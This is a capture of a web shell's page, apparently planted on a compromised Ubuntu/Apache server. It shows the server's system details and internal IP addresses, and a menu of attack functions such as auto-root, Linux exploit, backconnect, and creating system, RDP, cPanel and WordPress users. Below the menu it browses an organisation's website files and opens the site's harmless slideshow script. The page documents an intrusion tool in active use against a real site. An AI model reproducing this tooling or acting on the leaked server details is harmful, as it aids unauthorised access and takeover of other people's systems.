Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd-org-old /
static /
[ HOME SHELL ]
Name
Size
Permission
Action
banners
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
About_cipd.mp4
40.09
MB
-rw-r--r--
CIPD_Main.mp4
1.38
MB
-rw-r--r--
CiPDlogo.png
123.39
KB
-rw-r--r--
CiPDslideshow.mp4
1.43
MB
-rw-r--r--
IIIT-Delhilogo.svg
2.46
KB
-rw-r--r--
MakeInIndia.png
93.51
KB
-rw-r--r--
NSUT_logo.png
114.15
KB
-rw-r--r--
bg.mp4
1.95
MB
-rw-r--r--
cipdwebsiteserv.png
66.3
KB
-rw-r--r--
consultancy.jpeg
8.49
KB
-rw-r--r--
desmania_logo.jpeg
3.31
KB
-rw-r--r--
elcinalogo.png
3.24
KB
-rw-r--r--
epic.jpg
11.34
KB
-rw-r--r--
idea.jpg
38.14
KB
-rw-r--r--
iesa.jpg
59.43
KB
-rw-r--r--
iitlogo.png
110.41
KB
-rw-r--r--
insight_arrow.png
13.22
KB
-rw-r--r--
jamiacollege.jpg
51.1
KB
-rw-r--r--
logo68.png
13.42
KB
-rw-r--r--
mentoring.webp
87.07
KB
-rw-r--r--
milkywaytext.webp
747.42
KB
-rw-r--r--
onchip_logo.jpeg
9.78
KB
-rw-r--r--
our_mission.css
70.87
KB
-rw-r--r--
our_mission.js
2.11
KB
-rw-r--r--
pantcollege.jpg
14.12
KB
-rw-r--r--
press_release.jpg
1.49
MB
-rw-r--r--
product.jpg
31.98
KB
-rw-r--r--
prototypewebsite.png
3.62
MB
-rw-r--r--
research.jpg
75.85
KB
-rw-r--r--
script.js
3.21
KB
-rw-r--r--
solution.jpg
126.23
KB
-rw-r--r--
style.css
71.24
KB
-rw-r--r--
style_contact.css
9.75
KB
-rw-r--r--
styleres.css
2.41
KB
-rw-r--r--
tablet.png
447.46
KB
-rw-r--r--
waterpump.png
357.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
// script.js document.addEventListener('DOMContentLoaded', function () { // Initialize banner slideshow initializeBanners(); // Start auto-slide for other slideshows slideInterval = setInterval(autoSlide, 3000); showSlides(1); // Start the slideshow // Initialize the header styles based on scroll position updateHeaderStyles(); window.addEventListener('scroll', updateHeaderStyles); // Initialize pop-up event handlers setupPopupHandlers(); // Initialize banner rotation setupBannerRotation(); // Initialize mobile menu toggle toggleMobileMenu(); }); // Banner slideshow management let currentBannerIndex = 0; let bannerInterval; function initializeBanners() { const banners = document.querySelectorAll('.cipdwebsiteabout8 video, .cipdwebsiteabout8 img'); banners.forEach(banner => banner.style.display = 'none'); banners[0].style.display = 'block'; bannerInterval = setInterval(() => { banners[currentBannerIndex].style.display = 'none'; currentBannerIndex = (currentBannerIndex + 1) % banners.length; banners[currentBannerIndex].style.display = 'block'; const video = banners[currentBannerIndex].querySelector('video'); if (video) video.play(); }, 5000); } // Slideshow functionality let slideIndex = 0; function showSlides(n) { let slides = document.querySelectorAll(".mySlides"); if (n > slides.length) slideIndex = 1; else if (n < 1) slideIndex = slides.length; for (let slide of slides) slide.style.display = "none"; slides[slideIndex - 1].style.display = "block"; } function plusSlides(n) { showSlides(slideIndex += n); } function autoSlide() { plusSlides(1); } // Header style updates on scroll function updateHeaderStyles() { const header = document.querySelector('header'); const colorStrip = document.querySelector('.color-strip'); const scrollY = window.scrollY; header.style.backgroundColor = scrollY > 50 ? 'snow' : 'transparent'; colorStrip.style.top = scrollY > 50 ? '-30px' : '0'; header.style.top = scrollY > 50 ? '0' : '30px'; } // Popup functionality function setupPopupHandlers() { const popup = document.getElementById('popup'); function showPopup(name, description, imageSrc) { document.getElementById('popup-name').textContent = name; document.getElementById('popup-description').textContent = description; document.getElementById('popup-image').src = imageSrc; popup.style.display = 'block'; } function closePopup() { popup.style.display = 'none'; } } // Rotate banners based on timer function setupBannerRotation() { let currentIndex = 0; const banners = document.querySelectorAll('.cipdwebsiteabout'); setInterval(() => { banners[currentIndex].style.display = 'none'; currentIndex = (currentIndex + 1) % banners.length; banners[currentIndex].style.display = 'block'; }, 3000); } // Toggle mobile menu visibility function toggleMobileMenu() { const menu = document.querySelector('.homepage'); menu.style.display = menu.style.display === 'block' ? 'none' : 'block'; }
Close